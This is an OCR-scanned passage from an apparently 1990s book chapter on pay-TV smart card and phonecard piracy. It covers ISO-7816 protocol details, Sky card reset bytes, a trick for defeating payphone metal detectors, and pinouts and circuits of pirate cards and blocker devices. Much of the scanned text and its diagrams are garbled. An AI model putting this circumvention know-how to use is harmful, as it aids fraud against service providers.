memory existed. The first was to include the phonecard memory image as 
part of the microcontroller program. This was of course a very limited option 
as it meant that the same phonecard serial number was being used 
repeatedly. 


This kind of phonecard serial number reuse proved very dangerous for 
phreakers. The telcos could build up a pattern of phones where the 
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emulators were being used. Then it would be a simple matter to monitor the 
calls from those phones checking the numbers that were dialed by the 
people using the emulators. 


These calls were generally ET calls. The users were typically students at 
college and university and to cut down on the long distance phone charges 
when calling home, they would use the emulators. The ET reference comes 
from the movie where the extraterrestrial utters the phrase "phone home". 
With the current caller identification schemes implemented on some phone 
Systems, using emulators to call home is extremely unwise. 


The second method of loading the phonecard image into the emulator's 
memory was to include a card reader slot. This was a particularly elegant 
method and allowed the use of old phonecard serial numbers. This type of 
hack was largely associated with the 68705 version of the emulator. 


The second generation of emulators suffered from implementation prob- 
lems. This meant that they were never a commercial threat. 


Third Generation Emulators 


It could be said that the third generation of phonecard emulators developed 
as a result of the satellite television smart card piracy. The foundation of the 
satellite television smart card piracy in Europe is the PIC16C84 microcon- 
troller. Emulating a 6805 microcontroller is a difficult task but emulating a 
256 bit serial EPROM with a microcontroller was not that difficult. 


The result was that there was a barrage of PIC16C84 phonecard emulator 
programs available. The situation was not helped by the fact that the 
PicBuster routine allowed the programs from the phonecard emulators to be 
popped and widely distributed. 


The PIC16C84 version was perhaps the first really commercialised phone- 
card emulator. Apparently some manufacturers in Eastern Europe were 
manufacturing a European phonecard emulator that would work in most 
countries that had phonecards. Piracy, even when applied to telephone 
piracy, is a truly international industry. 


The PCB design for a PIC16C84 phonecard emulator was somewhat 
different to that of the satellite television pirate smart cards. Apart from the 
fact that the Vpp pad was used on the phonecards, the telcos had 
introduced an ECM that was designed to stop the use of phonecard 
emulators. 


The ECM was that the phones now included a metal detector. The official 
phonecard only had metal where the chip was. The rest of the card was just 
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plastic. However the phonecard emulators had metal PCB tracks between 
the pads and the circuitry. The metal detector would detect these tracks and 
stop the phone from working. 


Of course the solution to this ECM was simple. A flaw in the design of the 
metal detector was exploited. By grounding the metal detector it stopped 
working. The PCB design of the phonecard emulators was modified to 
include a strip that grounded the metal detector. The strip was built up with 
solder to ensure a good contact to the metal detector probe. These simple 
ECMs were no challenge for hackers and pirates who had worked on 
hacking D2-MAC and VideoCrypt. 


The Present Situation 


Satellite television piracy is more lucrative than phonecard piracy. The result 
is that most of the hackers and pirates tend to ignore this option. Besides it 
is too much of a legal risk. While at the moment, hacking satellite television 
channels is quasi-legal, hacking phonecards is definitely illegal. There is 
also no real challenge any more. Most of the real piracy on phone networks 
occurs on the mobile phones. It is far simpler to clone a mobile phone than it 
is to build a phonecard emulator. 


The ease with which mobile phones can be cloned tends to put the piracy 
on phonecards firmly in second place. Indeed it is not perceived to be much 
of a threat by the telcos. They are far more worried about the mobile phone 
fraud issues. If there is a high incidence of phonecard emulator use on a 
particular phone they can replace that phone with an ordinary payphone. 


This of course does not mean that phonecard piracy does not take place. 
The real reason that it is not a major industry is that it is not as economically 
lucrative as satellite television piracy. Of course in the future, should the 
newer smart cards be too complex to emulate on the PIC16C84s, there is 
the potential for a huge number of chips becoming available for incorpora- 
tion in phonecard emulators. 


The phones have some ECMs that are rather advanced and using an 
unproven device could prove dangerous. This is especially the case where 
the phone on detecting a pirate card would trigger an alarm call to the 
exchange. Some of the newer cards do not even use the V,, voltage. 
Instead they һауе an on-chip pump which multiplies the V,, supply voltage 
to generate Ур; internally. It is a continuing battle and a dangerous one for 
hackers. The telcos are not satellite channels. They are nastier. 
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As was stated previously, the reason that the telcos use the EPROM cards 
is because they are cheap and disposable. There are some newer versions 
appearing on the market and these are EEPROM. 


The main attraction for the telcos is the fact that the technology is both 
cheap and disposable. EEPROM cards however are reusable by nature. Of 
late, most of the high value cards have become increasingly difficult to buy. 
In Ireland, the card values are 10, 20, 50 and 100 units. The 100 unit cards 
are not widely available. It would seem that Telecom Eireann, the local 
telco, has withdrawn them. 


Perhaps a very good reason for limiting the availability of the high value 
cards is that the hacker and phreakers tend to use an image of these high 
value cards. Therefore with the lack of high value cards on the market, it 
would be easier to determine a usage pattern for emulators. 


British Telecom have also introduced phonecards recently. It is not yet 
known what kind of protocol they use yet. The cards may be using a 
Microwire like protocol (as per ordinary phonecards) or a different protocol 
modeled оп I2C. The cards also apparently have a time limit during which 
the cards are valid. UK phreakers are actively investigating the cards and it 
looks like there will be some hacks on the system in the next few months. 


The telcos in the rest of Europe using this technology have had problems 
with emulators. Some are managing to fight the piracy others are not so 
successful. As regards the systems being pirated on a commercial level, the 
situation is uncertain. 


With the collapse of the D2-MAC market due to internecine piracy rather 
than countermeasures by the channels and the lack of a PIC16C84 based 
hack on the Sky 10 card, a pan-European pirate phonecard is definitely an 
attractive proposition for some pirates. However most pirates would steer 
clear of this kind of product due to the risks involved. 
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The ISO-7816 Protocol 


The smart cards used on most scrambling systems use a serial data 
link running at 9600 baud. The exceptions to this are the DirecTv 
system and VideoCrypt-ll which initialise the card at 9600 Baud but 
then switch to 38400 Baud for data transmission. All of the data is 
transferred via this link. The ISO-7816 part 3 specification covers the 
card transmission protocols. 


When the card is inserted into the decoder, it is reset and it sends a 
packet of information to the decoder. This packet of information is 
known as the "Answer To Reset”. This perhaps the most important 
packet sent by the card as it tells the decoder what kind of 
communications protocol is to be used and also what signals and 
voltages are necessary for operation. 


The structure of this ATR packet is shown in the diagram. Most of the 
smart cards in operation in Europe use the T=0 protocol. The T=1 
version is a block transmission protocol whereas the T=0 protocol is a 
character transmission protocol. 


The T=0 protocol is asynchronous, half duplex, active low reset and 
uses inverse convention. The term asynchronous means that the 
protocol is serial as opposed to parallel. With parallel transmission, 
some form of clocking signal has to be sent, in an asynchronous 
protocol, there is no separate clocking signal. Half duplex means that it 
is a talk - listen protocol. At any one time the data is flowing in only 
one direction. The inverse convention means that the data has to be 
inverted and the order of the bits has to be reversed to read it with an 
RS232 interface. The format is roughly equivalent to 8 data bits, 1 
parity bit and 2 stop bits on the К5232 interface. 


The T=0 protocol is a character based protocol. Each character is 


composed of ten bits. The 
first bit is a stop bit. The Character Structure 


next eight bits are the 

data (a byte) and the last ШІ | 1 |. В 

bit is the Even Parity БУ ӨЛ КЕ Is ИН И (НИ | | 
check bit. This bit is used M 
for error correction and M 8 Bits Of Data 
always ensures that there Start Bit 
is an even number of 


ones in the character. 


Even Parity Check Bit 


Z and A are the logic levels 
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The Answer To Reset Packet Structure 


The Initial Character 


The Format Character 
The Interface Characters 


Clock Frequency 
Maximum Programming Current and Voltage 


Additional Guard Time Or Stop Bits Requested 


Subsequent Interface Characters And Protocol 


If the TD, character is not transmitted in а 
| packet then the protocol is assumed to be 
тете Т-0 and по further interface characters 





; TC2 follow. 

Sas This is exactly the situation with the official 
; TD? Sky (VideoCrypt) cards. They do not transmit 
}------ a ТО, character but the pirate VideoCrypt 


cards do transmit the TD, character. 





The Historical Characters (15 max) 


These characters are card specific. They describe 
the type of card, the software issue, the ROM mask, 
the manufacturer code, the issuer code and the 
period for which the card is valid. 


The Check Character 
This character is not transmitted in Т-0 only. 
4-21 





4: Smart Cards & Stupid Mistakes 


The character structure is 


shown in the diagram. The TS (ЗЕ Inverse Convention) 
levels Z and A are the logic 


levels. 2 
b8 67 |b6|b5|b4| b3|b2|b1 


In the inverse convention k 
(3Fh) the standard logic 

: “Ы 8Bits Of Data 2 
Start Bit 


polarity is reversed. (Z=0 and 
A=1). The order of the bits in 
the data is also reversed with 
the most significant bit being 
transmitted first. 


Even Parity Check Bit 
A=1 and Z=0 b8 is the msb 


In the direct convention 
(3Bh), the standard logic - 
polarity is used, (2-1 and TS (3B Direct Convention) 
A=0). The order of bits is 


- е 2 
normal with the least signifi- b1/b2!b3| 641 b5!b6|b7/b8 
cant bit being transmitted 
first. A 


7 в ваѕ Of Data 2 


The error correction mecha- 
nism in the T=0 protocol is Start Bit А . 
simple. If the parity check Even Parity Check Bit 
fails then a retransmission of Z=1 and A=0 b8 is the msb 

that bit is requested by 
sending an A level in the 
guardtime after the parity bit. This causes a retransmission of the 
character. This form of error correction has no direct equivalent in the 
RS232. 





The TS Character 


This is the initial character of the ATR. It is either 3Fh or 3Bh. The 
3Fh means that the inverse convention is used. The 3Bh means that 
the direct convention is used. 


The TO Character 


This is the format character. This character specifies what interface 
characters and how many historical characters are transmitted. The 
breakdown on this character is shown in the inset box. The high 
nybble determines which interface characters are sent. The low nybble 
determines how many historical characters are sent. 
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The Interface Characters 


The TA, Character 


This character controls the clock selection. The VideoCrypt decoder is 
designed to handle two clock frequencies; 3.512 and 7.1424 MHz. The 
value for a 3.5712 MHz clock is 11h and for a 7.1424 MHz clock the 
value is 31h. The strange clock frequency has to do with the fact that 
the 9600 baud rate is derived from dividing 3.5712 MHz by 372. 


The TB, Character 


This character specifies the programming voltage and current required 
by the card. The most significant bit of this character is always zero. 
The next two most significant bits specify the maximum programming 
current factor in the case of the VideoCrypt ATR the most significant 
bits are 10b and this equates to a factor of 100. The bits b5 to b1 
specify the programming voltage in volts. Again in the case of the 
VideoCrypt ATR (0101b) the programming voltage is 5 Volts. 


The TC, Character 


This character specifies how much extra guard time or stop bits to put 
between each character. In the VideoCrypt example, five stop bits are 
requested. The main idea here is to allow the card enough time to 
process each character before the next one arrives. 


The TD, Character 


In many respects this character is similar to the Format Character. The 
high nybble determines the presence of subsequent interface 
characters. The low nybble specifies the protocol to be used. 


If the TD1 character is not transmitted, as indeed it is not in the official 
Sky cards, then the protocol is assumed to be T=0. 


The T1 - TK Characters 


These are the historical characters. They provide information about the 
card itself. The information in this area generally relates to the version 
of the software, the processor type, the card issuer, the card 
manufacturer and the date of manufacture. 
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The TCK Character 


This is a final check character. It is the value necessary to ensure that 
the EXOR sum of all of the characters from TO to TCK is zero. This 
check character is not transmitted if only the Т-0 protocol is іп 
operation. 


ө Тһе TO Format Character 





Y1 indicates that there are interface bytes to follow. The bitset 
indicates which characters they are. 


b8=1 - TA1 (Clock Frequency) 

b7=1 - TB1 (Maximum Programming Current And Voltage) 

b6=1 - TC1 (Additional Guardtime or Stop Bits Requested) 

b5=1 - TD1 (Subsequent Interface Characters And Protocol) 


The K value indicates the number of historical characters transmitted. 
This is a number between 0 and 15, (Oh to Fh). 


Examples of the Answers To Reset from a number of different cards 
are given. The examples are those of an official Sky 07 card, and 
official Sky 09 card and a pirate 07 card. The first two are Sky cards 
and the last one is a pirate card. There are a number of characters 
that identify the Sky cards as being actual Sky cards. There are also 
some indicators that the actual card issue number and the month of 
issue are also included. 


The actual function of some of the characters is not known - yet. It 
does however appear that there is a manufacturer's identifier and batch 
number in addition to an microcontroller identifier. 
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Sky Card|| Pirate The Sky cards do not send 
a TD1 character but the pirate 


Issue 09 Issue 07 card does. 


ЗЕ SF The most important histori- 
7E FA cal characters are the 4D 59 
11 11 ones. The VideoCrypt deco- 
der checks each card inserted 
25 25 to see if these bytes are 
05 present in the historical 

characters area at that parti- 

00 cular position. If these charac- 
01 ters are not found in these 
positions , the card is rejec- 


BO ted. These appear to be the 
02 


VideoCrypt identifiers. Per- 
haps they are partial initials of 
3B the designers. 


34 The BO byte is not 
4D apparently essential though it 
does appear in all cards. This 
59 could be the microcontroller 
00 identifier that identifies the 
smart card (official) as a 6805 
81 type. 


80 The 53 4B characters may 
well be the identifiers for 
Motorola as in ASCII they are 
SK. Of course it is not clear 
what other characters identify 
the actual ROM Mask issue or 
indeed the program. Perhaps 
the characters before the 
VideoCrypt identifier are 
those to do with News Datacom’s internal program identification. 





The most obvious, if not a coincidence, are the two last characters 
of the official Sky cards. They identify the card issue as being 07 and 
09 respectively. The last character may be an integer value as the 09 
was a continuing subscription card. The subscription was taken in 
August 1993. 
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In the T=0 protocol, the decoder can send commands to the card. 
These commands are followed by a data transmission to or from the 
card. As the protocol is a character based protocol the card has some 
limited flow control capabilities. In addition to these capabilities the card 
can have the decoder turn on or off the programming voltage. This is 
achieved by using the Proce- 
dure Byte. Header Structure 


The decoder will send a five 

byte header to the card to [o ns Рт | P2 | P3 
initiate a command. The struc- 

ture of the header is shown 
opposite. 


The CLA is the class. For VideoCrypt this is always 53. INS is the 
instruction. This is the command instruction to be initiated. The P1 and 
P2 bytes are not used in VideoCrypt but are used in EuroCrypt. The 
P3 byte signals the length of the data. 





INS Send (Do not turn on Vpp) 
ACK INS +1 Send (Turn on Vpp) 
NOT (INS) Send Byte (Do not turn on Vpp) 
NOT (INS +1) Send Byte (Turn on Vpp) 
NULL 60h Wait 


SW1 SW1 End Of Transfer - wait for SW2 





After sending this header, the decoder then waits for the Procedure 
Byte. There is a number of types of procedure bytes. The main one is 
the Acknowledge or ACK byte. This tells the decoder how to proceed 
as regards transferring data and controlling the programming voltage. 


The NULL byte signals that the decoder should wait for a new 
procedure byte. The status word bytes SW1 and SW2 transmit the 
card's status after the end of the command. The SW1 byte is used 
when there is a significant error. The SW1 error conditions are as 
follows. 
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6E Instruction class not supported 

6D Unknown Instruction 

6B Incorrect address or reference 

67 Incorrect length 

6F Unknown and its wrong anyway! 

A normal command termination is represented by 90 00. 


Decoder 53 78 00 00 08 


38 4b 59 20 48 41 43 4b 





The diagram above is an example of the card - decoder traffic. The 
decoder sends the card a header requesting the eight byte decrypt 
key. The instruction for this command is 78h. The data is eight bytes 
long. 


On many of the early card traffic monitoring programs this transaction 
would appear as the following. 


53 78 00 00 08 78 53 4B 59 20 48 41 43 4B 90 00 


A basic communications program would show up a similar block 
structure but a translation table would have to be entered to produce 
the proper results. 
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The Technology Of Piracy 


The Blackbox industry has always been innovation led. It has had to create 
pirate devices that operated in exactly the same way as the official devices. 
In some cases these devices gave better results than the official models. 
When smart cards came along the logical thing was to figure out a solution. 
One of the first announced hacks on the D-MAC EuroCrypt-M system used 
what amounted to one of the first pirate cards. However it took some time 
for that hack, the Card Tricks hack to reach the market. 


The first solution for the VideoCrypt hack was on the KENtucky Fried Chip 
approach. This was where the smart card interface microcontroller of the 
official decoder was replaced with an 8752 that had with a modified program 
that had the algorithm and keys for the 07 card. This meant that it did not 
require a smart card. It was the Holy Grail that hackers were looking for - a 
cardless Sky decoder. It was however very impractical. 


The hack required the official decoder to be opened, the 8052 to be be 
removed and replaced with an 8752. It was a lot of work and people were 
not inclined to go for this hack. It was not user-friendly. Therefore it was not 
as commercially viable as most pirates desired. 


On a wet and gloomy Saturday afternoon, somewhere in Europe, the first 
pirate smart card for VideoCrypt 07 was fabricated. Based on the 
PIC16C54, it was to become famous as the Ho Lee Fook card. The 
PIC16C54 was emulating Sky's 07 smart card. Other versions followed 
including one based on an 8751 microcontroller but the PIC16C54 was 
initially the microcontroller of choice. 


The Card Tricks Card 


The first declared smart card hack on a smart card based system was the 
Card Tricks hack. Though it was announced late in 1992, it did not reach the 
market until 1993. It was perhaps a sign of things to come. When 
EuroCrypt-M fell, very few people, other than France Telecom and those in 
the companies using the system, were surprised. Instead there was a sense 
of wonder about why the hack took so long. The hack had been expected. 
After all, France Telecom had so generously facilitated this hack by having 
the system declared a European standard. And of course as a standard, it 
was possible to buy the full official specification of the system, less the 
crypto algorithm which was public knowledge anyway. 


It was not exactly thirty pieces of silver. In fact it was cheaper than that. 
There was no betrayal just a public revelation. As a hacker or a pirate, few 
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The original Ho Lee Fook card (1993) used the 


iginal Ho Lee Fook Card (199 
PRON AE Но Tee FOO СА 3) PIC16C54 microcontroller. This was a 512x12 








ыру Gnd EPROM OTP version. The implementation of 

Reset the initial Ho Lee Fook algorithm did not include 

pe the complete Hash checksum algorithm. 

Data Therefore Sky and News Datacom were easily 

Ck ” able to ECM it by sending spoof 74h packets. 
The official cards rejected the spoof packets 

7500 but the HLF cards did not. Тһе PIC16C54 was 


aa replaced later in 1993 by the PIC16C84. The 
Smart Card Connector Pads РІС16С84 was reprogrammable unlike the 
PIC16C54. 





Smart Card Connector Pads 





Reset The design of the PCB on 

DEM this card was innovative. 
xen The chip used in the design 

OV Gnd was recessed into a slot cut 

бажа into the РСВ. Тһе reason for 

50 this was to reduce the 

дісі maximum thickness of the 

ad card so that it would fit into 

some of the decoders. 








RTCC -MCLR 27 
Vdd OSC1 


nic OSC 2 
Vss RC7 
nic RC6 
RAO RC5 
RA1 RC4 
RA2 RC3 
RA3 RC2 
RBO RC1 
RCO 









This is the circuit diagram for the original Card Tricks hack on EuroCrypt. It 
was based on the PIC16C57 microcontroller. This was effectively the first 
of the hacks on the EuroCrypt system. It was announced in 1992 but it did 
not make it to the market until 1993. It worked perfectly though it was 
ECMed by a key change. Over the last few months, some manufacturers 
have started to use the PIC16C57 again as it is more difficult to extract the 
code from this chip than the PIC16C84. 


RB6 


РЇС16С57 
The Card Tricks Card Using РІС16С57 (1992) 


4-29 


4: Smart Cards & Stupid Mistakes 


things in this life come easy. France Telecom basically handed the details of 
their system to the hackers. As one hacker later commented when he had 
stopped laughing, “These are really not very bright guys. They gave us the 
specification and then they used a standard algorithm". 


The PCB layout of the Card Tricks card was unusual. The chip, a 
PIC16C57, was recessed into a slot cut into the board. The aim of this was 
to reduce the thickness of the card so that it would work in most decoders 
and IRDs. For the really tricky models, a longer PCB had to be manufac- 
tured but these were early days and this was the first hack. 


The Card Tricks hack worked well. Logically, the channels were a little bit 
upset and they changed their keys in order to ECM this card. Key changes 
were particularly problematic for this type of card. The PIC16C57 version 
used was an OTP type. This meant that it could not readily be repro- 
grammed. Though some areas of memory were reprogrammable, it would 
have created a major security risk to store new keys in this area. By the time 
of the ECM, there were other EuroCrypt-M pirate cards coming into the 
market. It was the beginning of the lingering death throes of EuroCrypt-M. 


The Ho Lee Fook Card 


The 8752 version of the Ho Lee Fook was never really a viable hack for the 
mass market. It involved too much hard work and was not user friendly. 
People were not keen on having their decoders modified. The solution was 
the Ho Lee Fook card. It was based on the PIC16C64. The version 
marketed used a one time programmable version of the PIC16C54. 


The PIC16C54 only lasted about three months in the market before the 
PIC16C84 began to replace it. The advantage of the PIC16C84 over the 
PIC16C54 was that it could be reprogrammed. This became a very 
important factor when Sky and News Datacom began to implement ECMs. 


The fact that the Ho Lee Fook card was in operation when Sky was 
launching the Multichannels package, did little to inspire confidence in the 
management of Sky and News Datacom. 


A few variations of the PIC16C84 card appeared. Mainly it was a case of a 
different pin being used for the Data line to the smart card connector pads. 


Towards the end of 1993, the frequency of ECMs was increasing along with 
the desperation of News Datacom. The hackers were winning the war. 
While Sky and News Datacom might have some temporary victory with an 
ECM it rarely lasted for more than a few days. The hackers were able to 
reprogram the cards. After a while, some pirates added an EEPROM to the 


4-30 


РІСІ6С84 





RA2 RA1 


КАЗ КАО 
RTCC/RA4 05С1 Smart Card Connector Pads 


9 -MCLR/Vpp OSC2 
x Vdd Vie 
5 RB7 à 
D RBG Data 
2 RBS 
= RBA баж 
ж ov 
a 
E Reset 
o 42% 
од Original PIC16C84 Smart Card Emulator (УС 07) 
5 
Ф РІСІ6С84 
o 
T RA2 RAI 
ВАЗ RAO 
8 RTCC/RA4 OSC1 Smart Card Connector Pads 
E -MCLR/Vpp OSC2 my 
o Vss Vdd Vee 
+ RBO/INT RB7 
b RB1 RB6 Data 
RB2 RBS 
RBS RB4 Clock 
ov 
Урр 


Reset 


Variant Of Original PICI6C84 Smart Card Emulator (VC 07) 
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card so that the ECM codes could be stored and selected by the card user. 
The selection method was via a touch pad. 


The Season Interface 


In the Spring of 1994, the Season program was developed by Markus Kuhn. 
This program allowed the PC to emulate an official Sky card. The PC serial 
port was interfaced to the decoder via what has now become known as a 
SEASON interface. 


This interface is based on the MAX232 RS232-TTL level converter chip. 
This chip converts the data flowing between the PC and decoder to levels 
that the RS232 serial port and the TTL card interface on decoder can each 
handle. 


This is the cornerstone of the PC emulator market. There is a number of 
commercial models of the interface on the market. They all seem to use the 
basic interface design but tend to call it different names. 


The beauty of this interface is that it simple to fabricate. It also works on 
most computers with a serial interface. The same interface will also work on 
an Apple MAC with the proper connecting cable. 


At present there are no working Season type hacks for the VideoCrypt Sky 
10 card issue, (0A). The version of VideoCrypt used by the Adult Channel 
and Eurotica is totally compromised and the Voyager program, the best 
available PC emulator program decrypts the Adult Channel, Eurotica and 
most of the D2-MAC EuroCrypt channels. 


The Phoenix Interface 


The Phoenix interface is a direct development of the Season interface. It 
allows the PC serial port to emulate a VideoCrypt decoder with the relevant 
software. The PC can then send and receive packets. 


The primary differences between the Phoenix interface and the Season 
interface are that the RESET line is controlled by the PC in the Phoenix 
interface and the Phoenix interface also has a crystal oscillator to supply the 
card with the clock signal. Pull-up resistors are also used on the card 
connections. 


An American version of the Phoenix interface currently being used with the 
DSS Phoenix program does not use a level converter and connects the card 
directly to the serial port. It has a 74НС00 based oscillator to supply the card 
clock signal. 
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Both connectors shown are female 
back of the connector. 
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Жа Smart Card Socket 


Усс and Gnd connections for 74HC04 and 7407 аге not 
shown. All unused inputs on these chips are grounded. The 10 
Ohm resistors on the card socket connections 

are protection resistors. The crystal used is a standard NTSC 
colour subcarrier crystal. 


Phoenix Interface (ISO Smart Card Programmer) 
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D2-MAC EuroCrypt Cards 


The development of pirate EuroCrypt cards only started with the PIC16C57. 
The reason that the PIC16C57 was selected initially was that it had a 
greater capacity than the PIC16C54. The knowledge of the PicBuster was 
not widespread. The risk of ECMs meant that any solution had to be easily 
reprogrammed. The result was the twin PIC16C84 D2-MAC cards. 


These cards were intended to be reprogrammed using the serial mode 
programming mode. As a result they used the full smart card connector pad 
array. Ordinarily most cards only used five of these pads with Vpp not 
connected. The two lower pads were connected to the RB7 pins on the 
PICs. This allowed each PIC to be selected individually for programming. 


The reprogramming of these cards can be carried out easily with PIC 
programmers like the Henk Schaer programmer or the David Tait program- 
mer. It requires a card socket which can be configured. For experimental 
purposes, most hackers tend to use a card socket recycled from a Genesis 
blocker. Wires soldered to the relevant pins can then be connected to the 
PIC programmer. 


The initial designs used touch pads. These pads allowed the card user to 
switch between keys on channels. The initial designs were commercial 
ones. Later when the PicBuster information was distributed, other versions 
of these cards were manufactured. The other versions did not have the 
touch pads as the programming skills and knowledge of the hackers and 
pirates had advanced sufficiently to make the cards more updatable. 


With the growing knowledge of how the EuroCrypt-M and EuroCrypt-S 
systems operated, hackers were able to streamline the code so that the 
essential routines could be included in a single PIC16C84. This was 
achieved mainly by optimising the implementation of the DES algorithm and 
by removing non-critical routines. This is perhaps why most single PIC 
implementations do not have any fancy display routines. 


As these cards are reprogrammable, they remain in continual use. There 
has been a trend recently for some pirates to offer reprogramming facilities 
for these cards. Since with the basic implementation of the D2-MAC 
EuroCrypt code there is no need for the second РІС16С84 it is removed 
and recycled. 
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Mane бы ë 
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Twin PIC D2-MAC With Touch Pads 


This is a commercial version that used touch pads 
to switch between key sets. 

This card can be reprogrammed in serial mode. Prog | 
The chips are programmed individually by 

selecting the relevant RB7 (pin 13). These pins 

are connected to the normally two normally 

unused pads on the smart card pad array. The 

smart card pad connections are shown opposite. 


Smart Card Connector Pads 
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Data — 
Clock | 
ОУ Gnd 
Reset | 
Serial Mode Programming 
Connections: 
PIC Smartcard Pads 
Pin 13 (RB7) Data 
Pin 12 (RB6) Clock 
Pin 14 (Vdd) 5V0 
Pin 5 (Vss) OV Gnd 
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РІСІ6С84 
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RA3 RAO 
RTCC/RA4 OSC1 
-MCLR/Vpp OSC2 


Smart Card Connector Pads 
























Vss Vdd 5V0 
RBO/INT RB7 айыда: 
RB1 RB6 Data 
RB2 RB5 
RB3 RB4 Clock 
OV Gnd 
Reset 
Serial Mode Programming 
Connections: 
PIC Smartcard Pads 
Pin 13 (RB7) Data 
Pin 12 (RB6) Clock 
Pin 14 (Vdd) 5V0 
Vss Vdd Pin 5 (Vss) OV Gnd 
ch Pad RBO/INT RB7 
RB1 RB6 —— — 
R82 RBS svo OV Gnd 
RB3 RB4 — 
, : Ret ^ (| — | Vpp(NotUsed) 
Twin PIC D2-MAC With Touch Pads = 
m 
This is a commercial version that used touch pads Cede | Du 
to switch between key sets. itc 
This card сап be reprogrammed in serial mode. | Vprog! ы | Vprog 2 


The chips are programmed individually by | | 
selecting the relevant RB7 (pin 13). These pins 

are connected to the normally two normally 

unused pads on the smart card pad array. The 

smart card pad connections are shown opposite. 
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Blockers And Activators 


The Sky 09 card issue was a complete disaster for Sky and News Datacom. 
It was not only the fact that it was totally compromised, other things led to a 
total loss of system integrity. The most important of these was the 
Blocker/Activator. It alone was responsible for Sky and News Datacom 
losing control of their own access control system. 


The Blocker/Activator was based on the Phoenix program. Initially the 
Phoenix program was used to activate the cards and then the pirate 
customer was given a blocker. The blocker would check the Sky datast- 
ream for a kill packet with the card’s serial number in it. If it found such a 
packet then it would stop it getting to the card. The theory of the blocker was 
based on an earlier hack, that of the KENtucky Fried Chip. 


However the success of the Blockers and activated cards could be seen 
from the over the air kill figures that some of the hackers had been 
monitoring. In the last quarter of 1994, Sky tried to kill almost One Million 
cards. Most of these cards had been used in blockers and activators. 
Quickstart Sky cards were being traded among pirates for £60 each. 


With the sheer volume of official cards that had to be modified, the idea of 
having the activator program, Phoenix, and the blockers as separate items 
became unfeasible. The solution was the combined blocker - activator. 


The combined device was mass produced. It had many names; Lazarus, 
Genesis, Gemini and SunBlocker were the most common. The circuit and 
PCB pattern given here are those of the Lazarus device. Other variants can 
be found on the usual internet sites and BBSes. 


Sky and News Datacom did manage to come up with an ECM that 
effectively rendered this particular hack void. It was using the nanocom- 
mands, commands hidden in the authorisation packet that looked to the 
blocker just like serial numbers. As a result the blocker let them through to 
the card with dire consequences. However by the time that this ECM was 
properly implemented, the first stable 09 pirate cards were hitting the 
market. 


Though there have been rumours of blockers for the Sky 10 card, there is 
no confirmation yet that such devices exist. It is also expected that this form 
of device will be used on DSS. 
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Lazarus / Genesis Activator-Blocker 





Socket Switch 












Switch Open - Card Present 





LAZARUS 





Instructions For Use:- 


Inset Uieuing Card into Lazarus. 
Inset Lazarus into Decoder. 
Press Decoder Authorise Button 
to Upgrade Uieuing Card. 

Ensure Card remains in Lazurus 
to prevent Card de-activation. 
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The Sky 09 PIC16C84 Pirate Cards 


News Datacom had learned the lessons of the 07 well. The 09 card was a 
great improvement on the 09. The algorithm was different and the new card 
was vastly more complex in operation. However that did not stop the 
hackers and pirates from trying. 


Apparently News Datacom had decided to include what is acknowledged to 
be a very dangerous element in any system - the capability for over the air 
reprogramming of the smart card. Of course there were some very good 
reasons for this. The VideoCrypt system was groaning under the load of 
new subscribers. Originally, it seems that it was not envisaged that 
VideoCrypt would be handling upwards of two million subscribers. There- 
fore some method of making the card more controllable and accessible to 
the subscription management system was required. In addition to this, the 
facility of nuking any pirate devices was required. 


News Datacom also went one step beyond safe. They made the whole 
address space of the card readable as input data for their hash algorithm. 
The initial result of this was that each pirate smart had to have an image of 
the official Sky card to use for the hashing algorithm. This was to prove the 
downfall of the 09 card. Once the hackers had a basic implementation of the 
hash function and checksumming, a knowledge of a few of the nanocom- 
mands and a Phoenix interface, it was possible to read the address space 
of the Sky card. The hack was called the Vampire Hack. 


The pirate cards that first appeared had two PIC16C84s and a 24C65. The 
later more stable models that appeared in November 1994 had a single 
PIC16C84 and a single 24C65. The 24C65 held the image of the Sky card 
memory. 


What followed was the complete collapse of the Sky subscriber manage- 
ment system. This can, in part, be attributed to the fact that the information 
for hacking the 09 was so widely available that anyone could get the source 
code or a PC Season type emulator or indeed the source code for the PIC 
cards on the internet and BBSes. 


Though the circuits given here are the most common, there were subtle 
variations where different ports on the PIC16C84 for used for the data 
connection. When Sky switched to the 10 card on 31/10/1995 after almost a 
year of total piracy, the pirate 09 cards were converted to D2-MAC cards. 
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РІСІ6С84 Initial VC 09 Design With 24C65 (Circa Oct 1994) 
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СОР8782 - Another One Bytes The Dust 


The days around the 28th September 1995 were chaos for the European 
Blackbox industry. FilmNet, TV1000 and the TV3s changed their keys. 


Pirate cards based on the PIC16C84 just did not work any more. The 
battery cards were updated within a few hours but the vast majority of pirate 
viewers were left without a picture. It was a momentary success for FilmNet 
and TV1000. All of the viewers using the MACcess emulators were hit also. 


A few days after this ECM new cards appeared. These new cards were 
capable of decoding FilmNet and TV1000 and the other D2-MAC EuroC- 
rypt-M channels. They were based on a National Semiconductor COP8782 
microcontroller and an 24C16 EEPROM. It was the first time that this 
particular chip had been used in any great quantity in the UK. It had 
previously been widely used in the Scandinavian region. 


Chaos is nothing new to the Blackbox industry. When a code change or 
ECM takes place there is a mad dash for the solution. The situation with the 
FilmNet/TV1000 key change has been no different. In an effort to protect 
the investment, some pirate card vendors switched to a new microcontrol- 
ler. The objective was clear - recover the initial investment and delay a 
proliferation of the new code for as long as possible. 


The whole basis of an ECM solution is that it trickles down. At first only a 
few companies get hold of the new code. The new code is then sold on 
down the line to the dealers. The flaw with this was that the new code was 
placed in the insecure PIC16C84 chips and there was no real means of 
controlling distribution once the code was popped from this chip. The 
COP8782, however was meant to be different. 


It was not the size of target that would interest hackers when the D2-MAC 
codes were freely available. Once it became clear that apart from the 
battery cards, this was the only chip available with the codes, it became a 
major target. 


Now it is just another "secure microcontroller" that was popped in the search 
for FilmNet and TV1000 codes. The latest in the range of pirate smart 
cards, the COP8782 based card has become another addition to the list of 
chips popped by the Blackbox industry. National Semiconductor have 
apparently introduced some modifications to the COP8782 chips that will 
make them harder to pop in the future. 


Essentially the pirate COP8782 chip carries the main program and and a 
small decryption routine. The new key codes are held in encrypted format in 


4-42 


The Millenium 12 COP Card - Based On The COP8782 


24LC16B 


Smart Cards & Stupid Mistakes 


4 





svo 


Data 








Reset 
OV Gnd 


Clock 


COP8782 





725 1dAUIOUNS 803 318971909 38 ТІМ 0992 SIHL 
"431930 719201 YNOA 1291М02 зандап 803 
"0892 HnIN3TIIH JHL 30 М015830 AZI 3н1 SI SIHL 


The COP Card was an attempt at 
imposing some form of order on 
the pirate card market. It was 
perhaps more innovative than the 
Battery Card in that it allowed for 
dealer specific updates. The card 
included a routine to decrypt the 
contents of the EEPROM. Thus 
one dealer's upgrade would not 
